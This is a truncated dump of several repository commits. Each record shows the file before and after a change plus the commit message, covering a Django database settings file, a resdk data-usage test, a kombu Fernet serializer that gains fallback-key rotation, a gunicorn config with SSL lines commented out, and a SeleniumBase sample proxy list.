'ENGINE': MYSQL_ENGINE,
'NAME': os.environ.get('MYSQL_NAME'),
'USER': os.environ.get('MYSQL_USER'),
'PASSWORD': os.environ.get('MYSQL_PW', ''),
'HOST': os.environ.get('MYSQL_HOST', ''), # empty string == localhost
'PORT': os.environ.get('MYSQL_PORT', ''), # empty string == default
'OPTIONS': {'init_command': os.environ.get('STORAGE_ENGINE', 'SET storage_engine=MYISAM') },
},
}
STATIC_ROOT = REPOSITORY_ROOT.child('collectstatic')
ALLOW_ADMIN_URL = DEBUG or os.environ.get('ALLOW_ADMIN_URL', False)
| from .base import *
DEBUG = True
INSTALLED_APPS += ('wagtail.contrib.wagtailstyleguide',)
DATABASES = {
'default': {
'ENGINE': MYSQL_ENGINE,
'NAME': os.environ.get('MYSQL_NAME'),
'USER': os.environ.get('MYSQL_USER'),
'PASSWORD': os.environ.get('MYSQL_PW', ''),
'HOST': os.environ.get('MYSQL_HOST', ''), # empty string == localhost
'PORT': os.environ.get('MYSQL_PORT', ''), # empty string == default
'OPTIONS': {'init_command': 'SET storage_engine=MYISAM', },
},
}
STATIC_ROOT = REPOSITORY_ROOT.child('collectstatic')
ALLOW_ADMIN_URL = DEBUG or os.environ.get('ALLOW_ADMIN_URL', False)
Allow init_command to be set by envfrom .base import *
DEBUG = True
INSTALLED_APPS += ('wagtail.contrib.wagtailstyleguide',)
DATABASES = {
'default': {
'ENGINE': MYSQL_ENGINE,
'NAME': os.environ.get('MYSQL_NAME'),
'USER': os.environ.get('MYSQL_USER'),
'PASSWORD': os.environ.get('MYSQL_PW', ''),
'HOST': os.environ.get('MYSQL_HOST', ''), # empty string == localhost
'PORT': os.environ.get('MYSQL_PORT', ''), # empty string == default
'OPTIONS': {'init_command': os.environ.get('STORAGE_ENGINE', 'SET storage_engine=MYISAM') },
},
}
STATIC_ROOT = REPOSITORY_ROOT.child('collectstatic')
ALLOW_ADMIN_URL = DEBUG or os.environ.get('ALLOW_ADMIN_URL', False)
| <commit_before>from .base import *
DEBUG = True
INSTALLED_APPS += ('wagtail.contrib.wagtailstyleguide',)
DATABASES = {
'default': {
'ENGINE': MYSQL_ENGINE,
'NAME': os.environ.get('MYSQL_NAME'),
'USER': os.environ.get('MYSQL_USER'),
'PASSWORD': os.environ.get('MYSQL_PW', ''),
'HOST': os.environ.get('MYSQL_HOST', ''), # empty string == localhost
'PORT': os.environ.get('MYSQL_PORT', ''), # empty string == default
'OPTIONS': {'init_command': 'SET storage_engine=MYISAM', },
},
}
STATIC_ROOT = REPOSITORY_ROOT.child('collectstatic')
ALLOW_ADMIN_URL = DEBUG or os.environ.get('ALLOW_ADMIN_URL', False)
<commit_msg>Allow init_command to be set by env<commit_after>from .base import *
DEBUG = True
INSTALLED_APPS += ('wagtail.contrib.wagtailstyleguide',)
DATABASES = {
'default': {
'ENGINE': MYSQL_ENGINE,
'NAME': os.environ.get('MYSQL_NAME'),
'USER': os.environ.get('MYSQL_USER'),
'PASSWORD': os.environ.get('MYSQL_PW', ''),
'HOST': os.environ.get('MYSQL_HOST', ''), # empty string == localhost
'PORT': os.environ.get('MYSQL_PORT', ''), # empty string == default
'OPTIONS': {'init_command': os.environ.get('STORAGE_ENGINE', 'SET storage_engine=MYISAM') },
},
}
STATIC_ROOT = REPOSITORY_ROOT.child('collectstatic')
ALLOW_ADMIN_URL = DEBUG or os.environ.get('ALLOW_ADMIN_URL', False)
|
a56b69ef48acb0badf04625650dfdc25d1517a81 | resdk/tests/functional/resolwe/e2e_resolwe.py | resdk/tests/functional/resolwe/e2e_resolwe.py | # pylint: disable=missing-docstring
from resdk.tests.functional.base import BaseResdkFunctionalTest
class TestDataUsage(BaseResdkFunctionalTest):
expected_fields = {
'user_id',
'username',
'full_name',
'data_size',
'data_size_normalized',
'data_count',
'data_count_normalized',
'sample_count',
'sample_count_normalized',
}
def test_normal_user(self):
usage_info = self.user_res.data_usage()
self.assertEqual(len(usage_info), 1)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_admin_user(self):
usage_info = self.res.data_usage()
self.assertGreaterEqual(len(usage_info), 2)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_ordering(self):
usage_info = self.res.data_usage(ordering=['full_name', '-data_size'])
self.assertGreaterEqual(len(usage_info), 2)
first = usage_info[0]
second = usage_info[1]
self.assertEqual(first['full_name'], second['full_name'])
self.assertGreaterEqual(first['data_size'], second['data_size'])
| # pylint: disable=missing-docstring
from resdk.tests.functional.base import BaseResdkFunctionalTest
class TestDataUsage(BaseResdkFunctionalTest):
expected_fields = {
'user_id',
'username',
'full_name',
'data_size',
'data_size_normalized',
'data_count',
'data_count_normalized',
'collection_count',
'collection_count_normalized',
'sample_count',
'sample_count_normalized',
}
def test_normal_user(self):
usage_info = self.user_res.data_usage()
self.assertEqual(len(usage_info), 1)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_admin_user(self):
usage_info = self.res.data_usage()
self.assertGreaterEqual(len(usage_info), 2)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_ordering(self):
usage_info = self.res.data_usage(ordering=['full_name', '-data_size'])
self.assertGreaterEqual(len(usage_info), 2)
first = usage_info[0]
second = usage_info[1]
self.assertEqual(first['full_name'], second['full_name'])
self.assertGreaterEqual(first['data_size'], second['data_size'])
| Support collection statistics in data usage tests | Support collection statistics in data usage tests
| Python | apache-2.0 | genialis/resolwe-bio-py | # pylint: disable=missing-docstring
from resdk.tests.functional.base import BaseResdkFunctionalTest
class TestDataUsage(BaseResdkFunctionalTest):
expected_fields = {
'user_id',
'username',
'full_name',
'data_size',
'data_size_normalized',
'data_count',
'data_count_normalized',
'sample_count',
'sample_count_normalized',
}
def test_normal_user(self):
usage_info = self.user_res.data_usage()
self.assertEqual(len(usage_info), 1)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_admin_user(self):
usage_info = self.res.data_usage()
self.assertGreaterEqual(len(usage_info), 2)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_ordering(self):
usage_info = self.res.data_usage(ordering=['full_name', '-data_size'])
self.assertGreaterEqual(len(usage_info), 2)
first = usage_info[0]
second = usage_info[1]
self.assertEqual(first['full_name'], second['full_name'])
self.assertGreaterEqual(first['data_size'], second['data_size'])
Support collection statistics in data usage tests | # pylint: disable=missing-docstring
from resdk.tests.functional.base import BaseResdkFunctionalTest
class TestDataUsage(BaseResdkFunctionalTest):
expected_fields = {
'user_id',
'username',
'full_name',
'data_size',
'data_size_normalized',
'data_count',
'data_count_normalized',
'collection_count',
'collection_count_normalized',
'sample_count',
'sample_count_normalized',
}
def test_normal_user(self):
usage_info = self.user_res.data_usage()
self.assertEqual(len(usage_info), 1)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_admin_user(self):
usage_info = self.res.data_usage()
self.assertGreaterEqual(len(usage_info), 2)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_ordering(self):
usage_info = self.res.data_usage(ordering=['full_name', '-data_size'])
self.assertGreaterEqual(len(usage_info), 2)
first = usage_info[0]
second = usage_info[1]
self.assertEqual(first['full_name'], second['full_name'])
self.assertGreaterEqual(first['data_size'], second['data_size'])
| <commit_before># pylint: disable=missing-docstring
from resdk.tests.functional.base import BaseResdkFunctionalTest
class TestDataUsage(BaseResdkFunctionalTest):
expected_fields = {
'user_id',
'username',
'full_name',
'data_size',
'data_size_normalized',
'data_count',
'data_count_normalized',
'sample_count',
'sample_count_normalized',
}
def test_normal_user(self):
usage_info = self.user_res.data_usage()
self.assertEqual(len(usage_info), 1)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_admin_user(self):
usage_info = self.res.data_usage()
self.assertGreaterEqual(len(usage_info), 2)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_ordering(self):
usage_info = self.res.data_usage(ordering=['full_name', '-data_size'])
self.assertGreaterEqual(len(usage_info), 2)
first = usage_info[0]
second = usage_info[1]
self.assertEqual(first['full_name'], second['full_name'])
self.assertGreaterEqual(first['data_size'], second['data_size'])
<commit_msg>Support collection statistics in data usage tests<commit_after> | # pylint: disable=missing-docstring
from resdk.tests.functional.base import BaseResdkFunctionalTest
class TestDataUsage(BaseResdkFunctionalTest):
expected_fields = {
'user_id',
'username',
'full_name',
'data_size',
'data_size_normalized',
'data_count',
'data_count_normalized',
'collection_count',
'collection_count_normalized',
'sample_count',
'sample_count_normalized',
}
def test_normal_user(self):
usage_info = self.user_res.data_usage()
self.assertEqual(len(usage_info), 1)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_admin_user(self):
usage_info = self.res.data_usage()
self.assertGreaterEqual(len(usage_info), 2)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_ordering(self):
usage_info = self.res.data_usage(ordering=['full_name', '-data_size'])
self.assertGreaterEqual(len(usage_info), 2)
first = usage_info[0]
second = usage_info[1]
self.assertEqual(first['full_name'], second['full_name'])
self.assertGreaterEqual(first['data_size'], second['data_size'])
| # pylint: disable=missing-docstring
from resdk.tests.functional.base import BaseResdkFunctionalTest
class TestDataUsage(BaseResdkFunctionalTest):
expected_fields = {
'user_id',
'username',
'full_name',
'data_size',
'data_size_normalized',
'data_count',
'data_count_normalized',
'sample_count',
'sample_count_normalized',
}
def test_normal_user(self):
usage_info = self.user_res.data_usage()
self.assertEqual(len(usage_info), 1)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_admin_user(self):
usage_info = self.res.data_usage()
self.assertGreaterEqual(len(usage_info), 2)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_ordering(self):
usage_info = self.res.data_usage(ordering=['full_name', '-data_size'])
self.assertGreaterEqual(len(usage_info), 2)
first = usage_info[0]
second = usage_info[1]
self.assertEqual(first['full_name'], second['full_name'])
self.assertGreaterEqual(first['data_size'], second['data_size'])
Support collection statistics in data usage tests# pylint: disable=missing-docstring
from resdk.tests.functional.base import BaseResdkFunctionalTest
class TestDataUsage(BaseResdkFunctionalTest):
expected_fields = {
'user_id',
'username',
'full_name',
'data_size',
'data_size_normalized',
'data_count',
'data_count_normalized',
'collection_count',
'collection_count_normalized',
'sample_count',
'sample_count_normalized',
}
def test_normal_user(self):
usage_info = self.user_res.data_usage()
self.assertEqual(len(usage_info), 1)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_admin_user(self):
usage_info = self.res.data_usage()
self.assertGreaterEqual(len(usage_info), 2)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_ordering(self):
usage_info = self.res.data_usage(ordering=['full_name', '-data_size'])
self.assertGreaterEqual(len(usage_info), 2)
first = usage_info[0]
second = usage_info[1]
self.assertEqual(first['full_name'], second['full_name'])
self.assertGreaterEqual(first['data_size'], second['data_size'])
| <commit_before># pylint: disable=missing-docstring
from resdk.tests.functional.base import BaseResdkFunctionalTest
class TestDataUsage(BaseResdkFunctionalTest):
expected_fields = {
'user_id',
'username',
'full_name',
'data_size',
'data_size_normalized',
'data_count',
'data_count_normalized',
'sample_count',
'sample_count_normalized',
}
def test_normal_user(self):
usage_info = self.user_res.data_usage()
self.assertEqual(len(usage_info), 1)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_admin_user(self):
usage_info = self.res.data_usage()
self.assertGreaterEqual(len(usage_info), 2)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_ordering(self):
usage_info = self.res.data_usage(ordering=['full_name', '-data_size'])
self.assertGreaterEqual(len(usage_info), 2)
first = usage_info[0]
second = usage_info[1]
self.assertEqual(first['full_name'], second['full_name'])
self.assertGreaterEqual(first['data_size'], second['data_size'])
<commit_msg>Support collection statistics in data usage tests<commit_after># pylint: disable=missing-docstring
from resdk.tests.functional.base import BaseResdkFunctionalTest
class TestDataUsage(BaseResdkFunctionalTest):
expected_fields = {
'user_id',
'username',
'full_name',
'data_size',
'data_size_normalized',
'data_count',
'data_count_normalized',
'collection_count',
'collection_count_normalized',
'sample_count',
'sample_count_normalized',
}
def test_normal_user(self):
usage_info = self.user_res.data_usage()
self.assertEqual(len(usage_info), 1)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_admin_user(self):
usage_info = self.res.data_usage()
self.assertGreaterEqual(len(usage_info), 2)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_ordering(self):
usage_info = self.res.data_usage(ordering=['full_name', '-data_size'])
self.assertGreaterEqual(len(usage_info), 2)
first = usage_info[0]
second = usage_info[1]
self.assertEqual(first['full_name'], second['full_name'])
self.assertGreaterEqual(first['data_size'], second['data_size'])
|
3956293089e500ef1f7d665bc3fcf45706fc5d6b | kombu_fernet/serializers/__init__.py | kombu_fernet/serializers/__init__.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import os
from cryptography.fernet import Fernet, InvalidToken
fernet = Fernet(os.environ['KOMBU_FERNET_KEY'])
def fernet_encode(func):
def inner(message):
return fernet.encrypt(func(message))
return inner
def fernet_decode(func):
def inner(encoded_message):
if isinstance(encoded_message, unicode):
encoded_message = encoded_message.encode('utf-8')
message = fernet.decrypt(encoded_message)
return func(message)
return inner
| # -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import os
from cryptography.fernet import Fernet, InvalidToken
fernet = Fernet(os.environ['KOMBU_FERNET_KEY'])
fallback_fernet = None
try:
fallback_fernet = Fernet(os.environ['OLD_KOMBU_FERNET_KEY'])
except KeyError:
pass
def fernet_encode(func):
def inner(message):
return fernet.encrypt(func(message))
return inner
def fernet_decode(func):
def inner(encoded_message):
if isinstance(encoded_message, unicode):
encoded_message = encoded_message.encode('utf-8')
try:
message = fernet.decrypt(encoded_message)
except InvalidToken:
message = fallback_fernet.decrypt(encoded_message)
return func(message)
return inner
| Add ability to in-place rotate fernet key. | Add ability to in-place rotate fernet key.
| Python | mit | heroku/kombu-fernet-serializers | # -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import os
from cryptography.fernet import Fernet, InvalidToken
fernet = Fernet(os.environ['KOMBU_FERNET_KEY'])
def fernet_encode(func):
def inner(message):
return fernet.encrypt(func(message))
return inner
def fernet_decode(func):
def inner(encoded_message):
if isinstance(encoded_message, unicode):
encoded_message = encoded_message.encode('utf-8')
message = fernet.decrypt(encoded_message)
return func(message)
return inner
Add ability to in-place rotate fernet key. | # -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import os
from cryptography.fernet import Fernet, InvalidToken
fernet = Fernet(os.environ['KOMBU_FERNET_KEY'])
fallback_fernet = None
try:
fallback_fernet = Fernet(os.environ['OLD_KOMBU_FERNET_KEY'])
except KeyError:
pass
def fernet_encode(func):
def inner(message):
return fernet.encrypt(func(message))
return inner
def fernet_decode(func):
def inner(encoded_message):
if isinstance(encoded_message, unicode):
encoded_message = encoded_message.encode('utf-8')
try:
message = fernet.decrypt(encoded_message)
except InvalidToken:
message = fallback_fernet.decrypt(encoded_message)
return func(message)
return inner
| <commit_before># -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import os
from cryptography.fernet import Fernet, InvalidToken
fernet = Fernet(os.environ['KOMBU_FERNET_KEY'])
def fernet_encode(func):
def inner(message):
return fernet.encrypt(func(message))
return inner
def fernet_decode(func):
def inner(encoded_message):
if isinstance(encoded_message, unicode):
encoded_message = encoded_message.encode('utf-8')
message = fernet.decrypt(encoded_message)
return func(message)
return inner
<commit_msg>Add ability to in-place rotate fernet key.<commit_after> | # -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import os
from cryptography.fernet import Fernet, InvalidToken
fernet = Fernet(os.environ['KOMBU_FERNET_KEY'])
fallback_fernet = None
try:
fallback_fernet = Fernet(os.environ['OLD_KOMBU_FERNET_KEY'])
except KeyError:
pass
def fernet_encode(func):
def inner(message):
return fernet.encrypt(func(message))
return inner
def fernet_decode(func):
def inner(encoded_message):
if isinstance(encoded_message, unicode):
encoded_message = encoded_message.encode('utf-8')
try:
message = fernet.decrypt(encoded_message)
except InvalidToken:
message = fallback_fernet.decrypt(encoded_message)
return func(message)
return inner
| # -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import os
from cryptography.fernet import Fernet, InvalidToken
fernet = Fernet(os.environ['KOMBU_FERNET_KEY'])
def fernet_encode(func):
def inner(message):
return fernet.encrypt(func(message))
return inner
def fernet_decode(func):
def inner(encoded_message):
if isinstance(encoded_message, unicode):
encoded_message = encoded_message.encode('utf-8')
message = fernet.decrypt(encoded_message)
return func(message)
return inner
Add ability to in-place rotate fernet key.# -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import os
from cryptography.fernet import Fernet, InvalidToken
fernet = Fernet(os.environ['KOMBU_FERNET_KEY'])
fallback_fernet = None
try:
fallback_fernet = Fernet(os.environ['OLD_KOMBU_FERNET_KEY'])
except KeyError:
pass
def fernet_encode(func):
def inner(message):
return fernet.encrypt(func(message))
return inner
def fernet_decode(func):
def inner(encoded_message):
if isinstance(encoded_message, unicode):
encoded_message = encoded_message.encode('utf-8')
try:
message = fernet.decrypt(encoded_message)
except InvalidToken:
message = fallback_fernet.decrypt(encoded_message)
return func(message)
return inner
| <commit_before># -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import os
from cryptography.fernet import Fernet, InvalidToken
fernet = Fernet(os.environ['KOMBU_FERNET_KEY'])
def fernet_encode(func):
def inner(message):
return fernet.encrypt(func(message))
return inner
def fernet_decode(func):
def inner(encoded_message):
if isinstance(encoded_message, unicode):
encoded_message = encoded_message.encode('utf-8')
message = fernet.decrypt(encoded_message)
return func(message)
return inner
<commit_msg>Add ability to in-place rotate fernet key.<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import os
from cryptography.fernet import Fernet, InvalidToken
fernet = Fernet(os.environ['KOMBU_FERNET_KEY'])
fallback_fernet = None
try:
fallback_fernet = Fernet(os.environ['OLD_KOMBU_FERNET_KEY'])
except KeyError:
pass
def fernet_encode(func):
def inner(message):
return fernet.encrypt(func(message))
return inner
def fernet_decode(func):
def inner(encoded_message):
if isinstance(encoded_message, unicode):
encoded_message = encoded_message.encode('utf-8')
try:
message = fernet.decrypt(encoded_message)
except InvalidToken:
message = fallback_fernet.decrypt(encoded_message)
return func(message)
return inner
|
2dac6ebe5bb2185fead39e28bb805ddb473f8aff | gunicorn_cfg.py | gunicorn_cfg.py | """
This file contains gunicorn settings.
To run sqmpy with gunicorn run the following command:
gunicorn -c gunicorn_cfg.py run:app
In order to daemonize gunicorn add -D flag:
gunicorn -c gunicorn_cfg.py run:app -D
"""
import multiprocessing
# Gunicorn will listen on the given host:port
bind = '0.0.0.0:5000'
# The only tested worker class is gevent
#worker_class = 'gevent'
# Set number of workers based on CPU count
workers = multiprocessing.cpu_count() * 2 + 1
# Uncomment for development
# reload = True
# Daemonize the application
daemon = False
# Comment only for development. Use your own certificates here.
keyfile = 'server.key'
certfile = 'server.crt'
# Application log level
loglevel = 'debug'
| """
This file contains gunicorn settings.
To run sqmpy with gunicorn run the following command:
gunicorn -c gunicorn_cfg.py run:app
In order to daemonize gunicorn add -D flag:
gunicorn -c gunicorn_cfg.py run:app -D
"""
import multiprocessing
# Gunicorn will listen on the given host:port
bind = '0.0.0.0:5000'
# The only tested worker class is gevent
#worker_class = 'gevent'
# Set number of workers based on CPU count
workers = multiprocessing.cpu_count() * 2 + 1
# Uncomment for development
# reload = True
# Daemonize the application
daemon = False
# Comment only for development. Use your own certificates here.
#keyfile = 'server.key'
#certfile = 'server.crt'
# Application log level
loglevel = 'debug'
| Disable SSL for default run | Disable SSL for default run
| Python | bsd-3-clause | simphony/sqmpy,mehdisadeghi/sqmpy,mehdisadeghi/sqmpy,mehdisadeghi/sqmpy,simphony/sqmpy,simphony/sqmpy | """
This file contains gunicorn settings.
To run sqmpy with gunicorn run the following command:
gunicorn -c gunicorn_cfg.py run:app
In order to daemonize gunicorn add -D flag:
gunicorn -c gunicorn_cfg.py run:app -D
"""
import multiprocessing
# Gunicorn will listen on the given host:port
bind = '0.0.0.0:5000'
# The only tested worker class is gevent
#worker_class = 'gevent'
# Set number of workers based on CPU count
workers = multiprocessing.cpu_count() * 2 + 1
# Uncomment for development
# reload = True
# Daemonize the application
daemon = False
# Comment only for development. Use your own certificates here.
keyfile = 'server.key'
certfile = 'server.crt'
# Application log level
loglevel = 'debug'
Disable SSL for default run | """
This file contains gunicorn settings.
To run sqmpy with gunicorn run the following command:
gunicorn -c gunicorn_cfg.py run:app
In order to daemonize gunicorn add -D flag:
gunicorn -c gunicorn_cfg.py run:app -D
"""
import multiprocessing
# Gunicorn will listen on the given host:port
bind = '0.0.0.0:5000'
# The only tested worker class is gevent
#worker_class = 'gevent'
# Set number of workers based on CPU count
workers = multiprocessing.cpu_count() * 2 + 1
# Uncomment for development
# reload = True
# Daemonize the application
daemon = False
# Comment only for development. Use your own certificates here.
#keyfile = 'server.key'
#certfile = 'server.crt'
# Application log level
loglevel = 'debug'
| <commit_before>"""
This file contains gunicorn settings.
To run sqmpy with gunicorn run the following command:
gunicorn -c gunicorn_cfg.py run:app
In order to daemonize gunicorn add -D flag:
gunicorn -c gunicorn_cfg.py run:app -D
"""
import multiprocessing
# Gunicorn will listen on the given host:port
bind = '0.0.0.0:5000'
# The only tested worker class is gevent
#worker_class = 'gevent'
# Set number of workers based on CPU count
workers = multiprocessing.cpu_count() * 2 + 1
# Uncomment for development
# reload = True
# Daemonize the application
daemon = False
# Comment only for development. Use your own certificates here.
keyfile = 'server.key'
certfile = 'server.crt'
# Application log level
loglevel = 'debug'
<commit_msg>Disable SSL for default run<commit_after> | """
This file contains gunicorn settings.
To run sqmpy with gunicorn run the following command:
gunicorn -c gunicorn_cfg.py run:app
In order to daemonize gunicorn add -D flag:
gunicorn -c gunicorn_cfg.py run:app -D
"""
import multiprocessing
# Gunicorn will listen on the given host:port
bind = '0.0.0.0:5000'
# The only tested worker class is gevent
#worker_class = 'gevent'
# Set number of workers based on CPU count
workers = multiprocessing.cpu_count() * 2 + 1
# Uncomment for development
# reload = True
# Daemonize the application
daemon = False
# Comment only for development. Use your own certificates here.
#keyfile = 'server.key'
#certfile = 'server.crt'
# Application log level
loglevel = 'debug'
| """
This file contains gunicorn settings.
To run sqmpy with gunicorn run the following command:
gunicorn -c gunicorn_cfg.py run:app
In order to daemonize gunicorn add -D flag:
gunicorn -c gunicorn_cfg.py run:app -D
"""
import multiprocessing
# Gunicorn will listen on the given host:port
bind = '0.0.0.0:5000'
# The only tested worker class is gevent
#worker_class = 'gevent'
# Set number of workers based on CPU count
workers = multiprocessing.cpu_count() * 2 + 1
# Uncomment for development
# reload = True
# Daemonize the application
daemon = False
# Comment only for development. Use your own certificates here.
keyfile = 'server.key'
certfile = 'server.crt'
# Application log level
loglevel = 'debug'
Disable SSL for default run"""
This file contains gunicorn settings.
To run sqmpy with gunicorn run the following command:
gunicorn -c gunicorn_cfg.py run:app
In order to daemonize gunicorn add -D flag:
gunicorn -c gunicorn_cfg.py run:app -D
"""
import multiprocessing
# Gunicorn will listen on the given host:port
bind = '0.0.0.0:5000'
# The only tested worker class is gevent
#worker_class = 'gevent'
# Set number of workers based on CPU count
workers = multiprocessing.cpu_count() * 2 + 1
# Uncomment for development
# reload = True
# Daemonize the application
daemon = False
# Comment only for development. Use your own certificates here.
#keyfile = 'server.key'
#certfile = 'server.crt'
# Application log level
loglevel = 'debug'
| <commit_before>"""
This file contains gunicorn settings.
To run sqmpy with gunicorn run the following command:
gunicorn -c gunicorn_cfg.py run:app
In order to daemonize gunicorn add -D flag:
gunicorn -c gunicorn_cfg.py run:app -D
"""
import multiprocessing
# Gunicorn will listen on the given host:port
bind = '0.0.0.0:5000'
# The only tested worker class is gevent
#worker_class = 'gevent'
# Set number of workers based on CPU count
workers = multiprocessing.cpu_count() * 2 + 1
# Uncomment for development
# reload = True
# Daemonize the application
daemon = False
# Comment only for development. Use your own certificates here.
keyfile = 'server.key'
certfile = 'server.crt'
# Application log level
loglevel = 'debug'
<commit_msg>Disable SSL for default run<commit_after>"""
This file contains gunicorn settings.
To run sqmpy with gunicorn run the following command:
gunicorn -c gunicorn_cfg.py run:app
In order to daemonize gunicorn add -D flag:
gunicorn -c gunicorn_cfg.py run:app -D
"""
import multiprocessing
# Gunicorn will listen on the given host:port
bind = '0.0.0.0:5000'
# The only tested worker class is gevent
#worker_class = 'gevent'
# Set number of workers based on CPU count
workers = multiprocessing.cpu_count() * 2 + 1
# Uncomment for development
# reload = True
# Daemonize the application
daemon = False
# Comment only for development. Use your own certificates here.
#keyfile = 'server.key'
#certfile = 'server.crt'
# Application log level
loglevel = 'debug'
|
212b5a126e464ff46e60e00846bbb87a2de3fbb2 | seleniumbase/config/proxy_list.py | seleniumbase/config/proxy_list.py | """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.26.66.140:3128", # (Example) - set your own proxy here
"example2": "64.235.204.107:8080", # (Example) - set your own proxy here
"example3": "82.200.233.4:3128", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
| """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.26.66.140:3128", # (Example) - set your own proxy here
"example2": "64.235.204.107:8080", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
| Update the sample proxy list | Update the sample proxy list
| Python | mit | mdmintz/SeleniumBase,seleniumbase/SeleniumBase,seleniumbase/SeleniumBase,seleniumbase/SeleniumBase,mdmintz/SeleniumBase,mdmintz/SeleniumBase,mdmintz/SeleniumBase,seleniumbase/SeleniumBase | """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.26.66.140:3128", # (Example) - set your own proxy here
"example2": "64.235.204.107:8080", # (Example) - set your own proxy here
"example3": "82.200.233.4:3128", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
Update the sample proxy list | """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.26.66.140:3128", # (Example) - set your own proxy here
"example2": "64.235.204.107:8080", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
| <commit_before>"""
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.26.66.140:3128", # (Example) - set your own proxy here
"example2": "64.235.204.107:8080", # (Example) - set your own proxy here
"example3": "82.200.233.4:3128", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
<commit_msg>Update the sample proxy list<commit_after> | """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
